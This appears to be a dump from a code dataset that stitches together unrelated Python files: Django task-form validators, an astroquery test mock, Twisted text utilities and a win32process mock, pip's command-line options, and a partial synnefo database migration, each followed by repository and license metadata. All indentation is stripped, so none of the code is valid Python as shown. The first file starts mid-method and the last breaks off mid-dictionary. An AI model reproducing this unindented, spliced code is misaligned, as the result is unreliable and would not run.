pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
content = self.cleaned_data['content']
l = len(content)
if l >= 1 and l <= 100 and pattern.match(content) and not pattern_blank.match(content):
return content
raise forms.ValidationError('content_err')
class BookTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
bookName = forms.CharField()
readFrom = forms.CharField()
readTo = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Book':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_bookName(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
bookName = self.cleaned_data['bookName']
l = len(bookName)
if l >= 1 and l <= 50 and pattern.match(bookName) and not pattern_blank.match(bookName):
return bookName
raise forms.ValidationError('bookName_err')
def clean_readFrom(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
readFrom = self.cleaned_data['readFrom']
l = len(readFrom)
if l >= 1 and l <= 50 and pattern.match(readFrom) and not pattern_blank.match(readFrom):
return readFrom
raise forms.ValidationError('readFrom_err')
def clean_readTo(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
readTo = self.cleaned_data['readTo']
l = len(readTo)
if l >= 1 and l <= 50 and pattern.match(readTo) and not pattern_blank.match(readTo):
return readTo
raise forms.ValidationError('readTo_err')
class WorkTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
summary = forms.CharField()
goal = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Work':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_summary(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
summary = self.cleaned_data['summary']
l = len(summary)
if l >= 1 and l <= 50 and pattern.match(summary) and not pattern_blank.match(summary):
return summary
raise forms.ValidationError('summary')
def clean_goal(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
goal = self.cleaned_data['goal']
l = len(goal)
if l >= 1 and l <= 50 and pattern.match(goal) and not pattern_blank.match(goal):
return goal
raise forms.ValidationError('goal_err')
class HomeworkTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
courseName = forms.CharField()
introduction = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Homework':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_courseName(self):
pattern = re.compile(u'^[a-zA-Z0-9\u4e00-\u9fa5]+$')
courseName = self.cleaned_data['courseName']
l = len(courseName)
if l >= 1 and l <= 10 and pattern.match(courseName):
return courseName
raise forms.ValidationError('courseName_err')
def clean_introduction(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
introduction = self.cleaned_data['introduction']
l = len(introduction)
if l >= 1 and l <= 100 and pattern.match(introduction) and not pattern_blank.match(introduction):
return introduction
raise forms.ValidationError('introduction_err')
class TaskIdForm(forms.Form):
taskId = forms.IntegerField()
def clean_taskId(self):
taskId = self.cleaned_data['taskId']
if taskId > 0:
return taskId
raise forms.ValidationError('taskId_err')
class ChangeDateForm(forms.Form):
taskId = forms.IntegerField()
date = forms.DateField()
time = forms.IntegerField()
def clean_taskId(self):
taskId = self.cleaned_data['taskId']
if taskId > 0:
return taskId
raise forms.ValidationError('taskId_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
class ExchangeTaskForm(forms.Form):
taskId1 = forms.IntegerField()
taskId2 = forms.IntegerField()
def clean_taskId1(self):
taskId1 = self.cleaned_data['taskId1']
if taskId1 > 0:
return taskId1
raise forms.ValidationError('taskId1_err')
def clean_taskId2(self):
taskId2 = self.cleaned_data['taskId2']
if taskId2 > 0:
return taskId2
raise forms.ValidationError('taskId2_err')
class DelayShiftTaskForm(forms.Form):
fromId = forms.IntegerField()
toId = forms.IntegerField()
def clean_fromId(self):
fromId = self.cleaned_data['fromId']
if fromId > 0:
return fromId
raise forms.ValidationError('fromId_err')
def clean_toId(self):
toId = self.cleaned_data['toId']
if toId > 0:
return toId
raise forms.ValidationError('toId_err')
|
bsd-3-clause
|
imbasimba/astroquery
|
astroquery/utils/tap/conn/tests/DummyConnHandler.py
|
2
|
5631
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
=============
TAP plus
=============
@author: Juan Carlos Segovia
@contact: juan.carlos.segovia@sciops.esa.int
European Space Astronomy Centre (ESAC)
European Space Agency (ESA)
Created on 30 jun. 2016
"""
from astroquery.utils.tap import taputils
from six.moves.urllib.parse import urlencode
import requests
class DummyConnHandler:
def __init__(self):
self.request = None
self.data = None
self.fileExt = ".ext"
self.defaultResponse = None
self.responses = {}
self.errorFileOutput = None
self.errorReceivedResponse = None
self.contentType = None
self.verbose = None
self.query = None
self.fileOutput = None
def set_default_response(self, defaultResponse):
self.defaultResponse = defaultResponse
def get_default_response(self):
return self.defaultResponse
def get_last_request(self):
return self.request
def get_last_data(self):
return self.data
def get_last_query(self):
return self.query
def get_error_file_output(self):
return self.errorFileOutput
def get_error_received_response(self):
return self.errorReceivedResponse
def set_response(self, request, response):
self.responses[str(request)] = response
def execute_tapget(self, request=None, verbose=False):
return self.__execute_get(request, verbose)
def execute_dataget(self, query, verbose=False):
return self.__execute_get(query)
def execute_datalinkget(self, subcontext, query, verbose=False):
self.query = query
return self.__execute_get(subcontext, verbose)
def __execute_get(self, request, verbose):
self.request = request
self.verbose = verbose
return self.__get_response(request)
def execute_tappost(self, subcontext=None, data=None,
content_type=None, verbose=False):
return self.__execute_post(subcontext, data, content_type, verbose)
def execute_datapost(self, data=None, content_type=None, verbose=False):
return self.__execute_post("", data, content_type, verbose)
def execute_datalinkpost(self, subcontext=None, data=None,
content_type=None, verbose=False):
return self.__execute_post(subcontext, data, content_type, verbose)
def __execute_post(self, subcontext=None, data=None,
content_type=None, verbose=False):
self.data = data
self.contentType = content_type
self.verbose = verbose
sortedKey = self.__create_sorted_dict_key(data)
if subcontext.find('?') == -1:
self.request = f"{subcontext}?{sortedKey}"
else:
if subcontext.endswith('?'):
self.request = f"{subcontext}{sortedKey}"
else:
self.request = f"{subcontext}&{sortedKey}"
return self.__get_response(self.request)
def dump_to_file(self, fileOutput, response):
self.errorFileOutput = fileOutput
self.errorReceivedResponse = response
print(f"DummyConnHandler - dump to file: file: '{fileOutput}', \
response status: {response.status}, response msg: {response.reason}")
def __get_response(self, responseid):
try:
return self.responses[str(responseid)]
except KeyError as e:
if self.defaultResponse is not None:
return self.defaultResponse
else:
print(f"\nNot found response for key\n\t'{responseid}'")
print("Available keys: ")
if self.responses is None:
print("\tNone available")
else:
for k in self.responses.keys():
print(f"\t'{k}'")
raise (e)
def __create_sorted_dict_key(self, data):
dictTmp = {}
items = data.split('&')
for i in (items):
subItems = i.split('=')
dictTmp[subItems[0]] = subItems[1]
# sort dict
return taputils.taputil_create_sorted_dict_key(dictTmp)
def check_launch_response_status(self, response, debug,
expected_response_status,
raise_exception=True):
isError = False
if response.status != expected_response_status:
if debug:
print(f"ERROR: {response.status}: {response.reason}")
isError = True
if isError and raise_exception:
errMsg = taputils.get_http_response_error(response)
print(response.status, errMsg)
raise requests.exceptions.HTTPError(errMsg)
else:
return isError
def url_encode(self, data):
return urlencode(data)
def get_suitable_extension(self, headers):
return self.fileExt
def set_suitable_extension(self, ext):
self.fileExt = ext
def get_suitable_extension_by_format(self, output_format):
return self.fileExt
def get_file_from_header(self, headers):
return self.fileOutput
def find_header(self, headers, key):
return taputils.taputil_find_header(headers, key)
def execute_table_edit(self, data,
content_type="application/x-www-form-urlencoded",
verbose=False):
return self.__execute_post(subcontext="tableEdit", data=data,
content_type=content_type, verbose=verbose)
|
bsd-3-clause
|
candy7393/VTK
|
ThirdParty/Twisted/twisted/python/text.py
|
40
|
5475
|
# -*- test-case-name: twisted.test.test_text -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Miscellany of text-munging functions.
"""
def stringyString(object, indentation=''):
"""
Expansive string formatting for sequence types.
C{list.__str__} and C{dict.__str__} use C{repr()} to display their
elements. This function also turns these sequence types
into strings, but uses C{str()} on their elements instead.
Sequence elements are also displayed on seperate lines, and nested
sequences have nested indentation.
"""
braces = ''
sl = []
if type(object) is dict:
braces = '{}'
for key, value in object.items():
value = stringyString(value, indentation + ' ')
if isMultiline(value):
if endsInNewline(value):
value = value[:-len('\n')]
sl.append("%s %s:\n%s" % (indentation, key, value))
else:
# Oops. Will have to move that indentation.
sl.append("%s %s: %s" % (indentation, key,
value[len(indentation) + 3:]))
elif type(object) is tuple or type(object) is list:
if type(object) is tuple:
braces = '()'
else:
braces = '[]'
for element in object:
element = stringyString(element, indentation + ' ')
sl.append(element.rstrip() + ',')
else:
sl[:] = map(lambda s, i=indentation: i + s,
str(object).split('\n'))
if not sl:
sl.append(indentation)
if braces:
sl[0] = indentation + braces[0] + sl[0][len(indentation) + 1:]
sl[-1] = sl[-1] + braces[-1]
s = "\n".join(sl)
if isMultiline(s) and not endsInNewline(s):
s = s + '\n'
return s
def isMultiline(s):
"""
Returns C{True} if this string has a newline in it.
"""
return (s.find('\n') != -1)
def endsInNewline(s):
"""
Returns C{True} if this string ends in a newline.
"""
return (s[-len('\n'):] == '\n')
def greedyWrap(inString, width=80):
"""
Given a string and a column width, return a list of lines.
Caveat: I'm use a stupid greedy word-wrapping
algorythm. I won't put two spaces at the end
of a sentence. I don't do full justification.
And no, I've never even *heard* of hypenation.
"""
outLines = []
#eww, evil hacks to allow paragraphs delimited by two \ns :(
if inString.find('\n\n') >= 0:
paragraphs = inString.split('\n\n')
for para in paragraphs:
outLines.extend(greedyWrap(para, width) + [''])
return outLines
inWords = inString.split()
column = 0
ptr_line = 0
while inWords:
column = column + len(inWords[ptr_line])
ptr_line = ptr_line + 1
if (column > width):
if ptr_line == 1:
# This single word is too long, it will be the whole line.
pass
else:
# We've gone too far, stop the line one word back.
ptr_line = ptr_line - 1
(l, inWords) = (inWords[0:ptr_line], inWords[ptr_line:])
outLines.append(' '.join(l))
ptr_line = 0
column = 0
elif not (len(inWords) > ptr_line):
# Clean up the last bit.
outLines.append(' '.join(inWords))
del inWords[:]
else:
# Space
column = column + 1
# next word
return outLines
wordWrap = greedyWrap
def removeLeadingBlanks(lines):
ret = []
for line in lines:
if ret or line.strip():
ret.append(line)
return ret
def removeLeadingTrailingBlanks(s):
lines = removeLeadingBlanks(s.split('\n'))
lines.reverse()
lines = removeLeadingBlanks(lines)
lines.reverse()
return '\n'.join(lines)+'\n'
def splitQuoted(s):
"""
Like a string split, but don't break substrings inside quotes.
>>> splitQuoted('the "hairy monkey" likes pie')
['the', 'hairy monkey', 'likes', 'pie']
Another one of those "someone must have a better solution for
this" things. This implementation is a VERY DUMB hack done too
quickly.
"""
out = []
quot = None
phrase = None
for word in s.split():
if phrase is None:
if word and (word[0] in ("\"", "'")):
quot = word[0]
word = word[1:]
phrase = []
if phrase is None:
out.append(word)
else:
if word and (word[-1] == quot):
word = word[:-1]
phrase.append(word)
out.append(" ".join(phrase))
phrase = None
else:
phrase.append(word)
return out
def strFile(p, f, caseSensitive=True):
"""
Find whether string C{p} occurs in a read()able object C{f}.
@rtype: C{bool}
"""
buf = ""
buf_len = max(len(p), 2**2**2**2)
if not caseSensitive:
p = p.lower()
while 1:
r = f.read(buf_len-len(p))
if not caseSensitive:
r = r.lower()
bytes_read = len(r)
if bytes_read == 0:
return False
l = len(buf)+bytes_read-buf_len
if l <= 0:
buf = buf + r
else:
buf = buf[l:] + r
if buf.find(p) != -1:
return True
|
bsd-3-clause
|
ehashman/oh-mainline
|
vendor/packages/twisted/twisted/test/mock_win32process.py
|
82
|
1499
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This is a mock win32process module.
The purpose of this module is mock process creation for the PID test.
CreateProcess(...) will spawn a process, and always return a PID of 42.
"""
import win32process
GetExitCodeProcess = win32process.GetExitCodeProcess
STARTUPINFO = win32process.STARTUPINFO
STARTF_USESTDHANDLES = win32process.STARTF_USESTDHANDLES
def CreateProcess(appName,
cmdline,
procSecurity,
threadSecurity,
inheritHandles,
newEnvironment,
env,
workingDir,
startupInfo):
"""
This function mocks the generated pid aspect of the win32.CreateProcess
function.
- the true win32process.CreateProcess is called
- return values are harvested in a tuple.
- all return values from createProcess are passed back to the calling
function except for the pid, the returned pid is hardcoded to 42
"""
hProcess, hThread, dwPid, dwTid = win32process.CreateProcess(
appName,
cmdline,
procSecurity,
threadSecurity,
inheritHandles,
newEnvironment,
env,
workingDir,
startupInfo)
dwPid = 42
return (hProcess, hThread, dwPid, dwTid)
|
agpl-3.0
|
h4ck3rm1k3/pip
|
pip/cmdoptions.py
|
239
|
14701
|
"""
shared options and groups
The principle here is to define options once, but *not* instantiate them
globally. One reason being that options with action='append' can carry state
between parses. pip parses general options twice internally, and shouldn't
pass on state. To be consistent, all options will follow this design.
"""
from __future__ import absolute_import
from functools import partial
from optparse import OptionGroup, SUPPRESS_HELP, Option
import warnings
from pip.index import (
PyPI, FormatControl, fmt_ctl_handle_mutual_exclude, fmt_ctl_no_binary,
fmt_ctl_no_use_wheel)
from pip.locations import CA_BUNDLE_PATH, USER_CACHE_DIR, src_prefix
def make_option_group(group, parser):
"""
Return an OptionGroup object
group -- assumed to be dict with 'name' and 'options' keys
parser -- an optparse Parser
"""
option_group = OptionGroup(parser, group['name'])
for option in group['options']:
option_group.add_option(option())
return option_group
def resolve_wheel_no_use_binary(options):
if not options.use_wheel:
control = options.format_control
fmt_ctl_no_use_wheel(control)
def check_install_build_global(options, check_options=None):
"""Disable wheels if per-setup.py call options are set.
:param options: The OptionParser options to update.
:param check_options: The options to check, if not supplied defaults to
options.
"""
if check_options is None:
check_options = options
def getname(n):
return getattr(check_options, n, None)
names = ["build_options", "global_options", "install_options"]
if any(map(getname, names)):
control = options.format_control
fmt_ctl_no_binary(control)
warnings.warn(
'Disabling all use of wheels due to the use of --build-options '
'/ --global-options / --install-options.', stacklevel=2)
###########
# options #
###########
help_ = partial(
Option,
'-h', '--help',
dest='help',
action='help',
help='Show help.')
isolated_mode = partial(
Option,
"--isolated",
dest="isolated_mode",
action="store_true",
default=False,
help=(
"Run pip in an isolated mode, ignoring environment variables and user "
"configuration."
),
)
require_virtualenv = partial(
Option,
# Run only if inside a virtualenv, bail if not.
'--require-virtualenv', '--require-venv',
dest='require_venv',
action='store_true',
default=False,
help=SUPPRESS_HELP)
verbose = partial(
Option,
'-v', '--verbose',
dest='verbose',
action='count',
default=0,
help='Give more output. Option is additive, and can be used up to 3 times.'
)
version = partial(
Option,
'-V', '--version',
dest='version',
action='store_true',
help='Show version and exit.')
quiet = partial(
Option,
'-q', '--quiet',
dest='quiet',
action='count',
default=0,
help='Give less output.')
log = partial(
Option,
"--log", "--log-file", "--local-log",
dest="log",
metavar="path",
help="Path to a verbose appending log."
)
log_explicit_levels = partial(
Option,
# Writes the log levels explicitely to the log'
'--log-explicit-levels',
dest='log_explicit_levels',
action='store_true',
default=False,
help=SUPPRESS_HELP)
no_input = partial(
Option,
# Don't ask for input
'--no-input',
dest='no_input',
action='store_true',
default=False,
help=SUPPRESS_HELP)
proxy = partial(
Option,
'--proxy',
dest='proxy',
type='str',
default='',
help="Specify a proxy in the form [user:passwd@]proxy.server:port.")
retries = partial(
Option,
'--retries',
dest='retries',
type='int',
default=5,
help="Maximum number of retries each connection should attempt "
"(default %default times).")
timeout = partial(
Option,
'--timeout', '--default-timeout',
metavar='sec',
dest='timeout',
type='float',
default=15,
help='Set the socket timeout (default %default seconds).')
default_vcs = partial(
Option,
# The default version control system for editables, e.g. 'svn'
'--default-vcs',
dest='default_vcs',
type='str',
default='',
help=SUPPRESS_HELP)
skip_requirements_regex = partial(
Option,
# A regex to be used to skip requirements
'--skip-requirements-regex',
dest='skip_requirements_regex',
type='str',
default='',
help=SUPPRESS_HELP)
def exists_action():
return Option(
# Option when path already exist
'--exists-action',
dest='exists_action',
type='choice',
choices=['s', 'i', 'w', 'b'],
default=[],
action='append',
metavar='action',
help="Default action when a path already exists: "
"(s)witch, (i)gnore, (w)ipe, (b)ackup.")
cert = partial(
Option,
'--cert',
dest='cert',
type='str',
default=CA_BUNDLE_PATH,
metavar='path',
help="Path to alternate CA bundle.")
client_cert = partial(
Option,
'--client-cert',
dest='client_cert',
type='str',
default=None,
metavar='path',
help="Path to SSL client certificate, a single file containing the "
"private key and the certificate in PEM format.")
index_url = partial(
Option,
'-i', '--index-url', '--pypi-url',
dest='index_url',
metavar='URL',
default=PyPI.simple_url,
help='Base URL of Python Package Index (default %default).')
def extra_index_url():
return Option(
'--extra-index-url',
dest='extra_index_urls',
metavar='URL',
action='append',
default=[],
help='Extra URLs of package indexes to use in addition to --index-url.'
)
no_index = partial(
Option,
'--no-index',
dest='no_index',
action='store_true',
default=False,
help='Ignore package index (only looking at --find-links URLs instead).')
def find_links():
return Option(
'-f', '--find-links',
dest='find_links',
action='append',
default=[],
metavar='url',
help="If a url or path to an html file, then parse for links to "
"archives. If a local path or file:// url that's a directory,"
"then look for archives in the directory listing.")
def allow_external():
return Option(
"--allow-external",
dest="allow_external",
action="append",
default=[],
metavar="PACKAGE",
help="Allow the installation of a package even if it is externally "
"hosted",
)
allow_all_external = partial(
Option,
"--allow-all-external",
dest="allow_all_external",
action="store_true",
default=False,
help="Allow the installation of all packages that are externally hosted",
)
def trusted_host():
return Option(
"--trusted-host",
dest="trusted_hosts",
action="append",
metavar="HOSTNAME",
default=[],
help="Mark this host as trusted, even though it does not have valid "
"or any HTTPS.",
)
# Remove after 7.0
no_allow_external = partial(
Option,
"--no-allow-external",
dest="allow_all_external",
action="store_false",
default=False,
help=SUPPRESS_HELP,
)
# Remove --allow-insecure after 7.0
def allow_unsafe():
return Option(
"--allow-unverified", "--allow-insecure",
dest="allow_unverified",
action="append",
default=[],
metavar="PACKAGE",
help="Allow the installation of a package even if it is hosted "
"in an insecure and unverifiable way",
)
# Remove after 7.0
no_allow_unsafe = partial(
Option,
"--no-allow-insecure",
dest="allow_all_insecure",
action="store_false",
default=False,
help=SUPPRESS_HELP
)
# Remove after 1.5
process_dependency_links = partial(
Option,
"--process-dependency-links",
dest="process_dependency_links",
action="store_true",
default=False,
help="Enable the processing of dependency links.",
)
def constraints():
return Option(
'-c', '--constraint',
dest='constraints',
action='append',
default=[],
metavar='file',
help='Constrain versions using the given constraints file. '
'This option can be used multiple times.')
def requirements():
return Option(
'-r', '--requirement',
dest='requirements',
action='append',
default=[],
metavar='file',
help='Install from the given requirements file. '
'This option can be used multiple times.')
def editable():
return Option(
'-e', '--editable',
dest='editables',
action='append',
default=[],
metavar='path/url',
help=('Install a project in editable mode (i.e. setuptools '
'"develop mode") from a local project path or a VCS url.'),
)
src = partial(
Option,
'--src', '--source', '--source-dir', '--source-directory',
dest='src_dir',
metavar='dir',
default=src_prefix,
help='Directory to check out editable projects into. '
'The default in a virtualenv is "<venv path>/src". '
'The default for global installs is "<current dir>/src".'
)
# XXX: deprecated, remove in 9.0
use_wheel = partial(
Option,
'--use-wheel',
dest='use_wheel',
action='store_true',
default=True,
help=SUPPRESS_HELP,
)
# XXX: deprecated, remove in 9.0
no_use_wheel = partial(
Option,
'--no-use-wheel',
dest='use_wheel',
action='store_false',
default=True,
help=('Do not Find and prefer wheel archives when searching indexes and '
'find-links locations. DEPRECATED in favour of --no-binary.'),
)
def _get_format_control(values, option):
"""Get a format_control object."""
return getattr(values, option.dest)
def _handle_no_binary(option, opt_str, value, parser):
existing = getattr(parser.values, option.dest)
fmt_ctl_handle_mutual_exclude(
value, existing.no_binary, existing.only_binary)
def _handle_only_binary(option, opt_str, value, parser):
existing = getattr(parser.values, option.dest)
fmt_ctl_handle_mutual_exclude(
value, existing.only_binary, existing.no_binary)
def no_binary():
return Option(
"--no-binary", dest="format_control", action="callback",
callback=_handle_no_binary, type="str",
default=FormatControl(set(), set()),
help="Do not use binary packages. Can be supplied multiple times, and "
"each time adds to the existing value. Accepts either :all: to "
"disable all binary packages, :none: to empty the set, or one or "
"more package names with commas between them. Note that some "
"packages are tricky to compile and may fail to install when "
"this option is used on them.")
def only_binary():
return Option(
"--only-binary", dest="format_control", action="callback",
callback=_handle_only_binary, type="str",
default=FormatControl(set(), set()),
help="Do not use source packages. Can be supplied multiple times, and "
"each time adds to the existing value. Accepts either :all: to "
"disable all source packages, :none: to empty the set, or one or "
"more package names with commas between them. Packages without "
"binary distributions will fail to install when this option is "
"used on them.")
cache_dir = partial(
Option,
"--cache-dir",
dest="cache_dir",
default=USER_CACHE_DIR,
metavar="dir",
help="Store the cache data in <dir>."
)
no_cache = partial(
Option,
"--no-cache-dir",
dest="cache_dir",
action="store_false",
help="Disable the cache.",
)
download_cache = partial(
Option,
'--download-cache',
dest='download_cache',
default=None,
help=SUPPRESS_HELP)
no_deps = partial(
Option,
'--no-deps', '--no-dependencies',
dest='ignore_dependencies',
action='store_true',
default=False,
help="Don't install package dependencies.")
build_dir = partial(
Option,
'-b', '--build', '--build-dir', '--build-directory',
dest='build_dir',
metavar='dir',
help='Directory to unpack packages into and build in.'
)
install_options = partial(
Option,
'--install-option',
dest='install_options',
action='append',
metavar='options',
help="Extra arguments to be supplied to the setup.py install "
"command (use like --install-option=\"--install-scripts=/usr/local/"
"bin\"). Use multiple --install-option options to pass multiple "
"options to setup.py install. If you are using an option with a "
"directory path, be sure to use absolute path.")
global_options = partial(
Option,
'--global-option',
dest='global_options',
action='append',
metavar='options',
help="Extra global options to be supplied to the setup.py "
"call before the install command.")
no_clean = partial(
Option,
'--no-clean',
action='store_true',
default=False,
help="Don't clean up build directories.")
disable_pip_version_check = partial(
Option,
"--disable-pip-version-check",
dest="disable_pip_version_check",
action="store_true",
default=False,
help="Don't periodically check PyPI to determine whether a new version "
"of pip is available for download. Implied with --no-index.")
# Deprecated, Remove later
always_unzip = partial(
Option,
'-Z', '--always-unzip',
dest='always_unzip',
action='store_true',
help=SUPPRESS_HELP,
)
##########
# groups #
##########
general_group = {
'name': 'General Options',
'options': [
help_,
isolated_mode,
require_virtualenv,
verbose,
version,
quiet,
log,
log_explicit_levels,
no_input,
proxy,
retries,
timeout,
default_vcs,
skip_requirements_regex,
exists_action,
trusted_host,
cert,
client_cert,
cache_dir,
no_cache,
disable_pip_version_check,
]
}
index_group = {
'name': 'Package Index Options',
'options': [
index_url,
extra_index_url,
no_index,
find_links,
allow_external,
allow_all_external,
no_allow_external,
allow_unsafe,
no_allow_unsafe,
process_dependency_links,
]
}
|
mit
|
dimara/synnefo
|
snf-cyclades-app/synnefo/db/migrations/0046_auto__chg_field_backend_password_hash.py
|
10
|
11564
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Backend.password_hash'
db.alter_column('db_backend', 'password_hash', self.gf('django.db.models.fields.CharField')(max_length=128, null=True, blank=True))
def backwards(self, orm):
# Changing field 'Backend.password_hash'
db.alter_column('db_backend', 'password_hash', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True))
models = {
'db.backend': {
'Meta': {'object_name': 'Backend'},
'clustername': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'ctotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'dfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'drained': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'dtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offline': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'password_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'pinst_cnt': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'port': ('django.db.models.fields.PositiveIntegerField', [], {'default': '5080'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
'db.backendnetwork': {
'Meta': {'object_name': 'BackendNetwork'},
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'networks'", 'to': "orm['db.Backend']"}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'backend_networks'", 'to': "orm['db.Network']"}),
'operstate': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '30'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'db.bridgepool': {
'Meta': {'object_name': 'BridgePool'},
'available': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'db.flavor': {
'Meta': {'unique_together': "(('cpu', 'ram', 'disk', 'disk_template'),)", 'object_name': 'Flavor'},
'cpu': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'disk': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'disk_template': ('django.db.models.fields.CharField', [], {'default': "'drbd'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ram': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'db.macprefixpool': {
'Meta': {'object_name': 'MacPrefixPool'},
'available': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'db.network': {
'Meta': {'object_name': 'Network'},
'action': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'dhcp': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'gateway': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'gateway6': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'mac_prefix': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'machines': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['db.VirtualMachine']", 'through': "orm['db.NetworkInterface']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
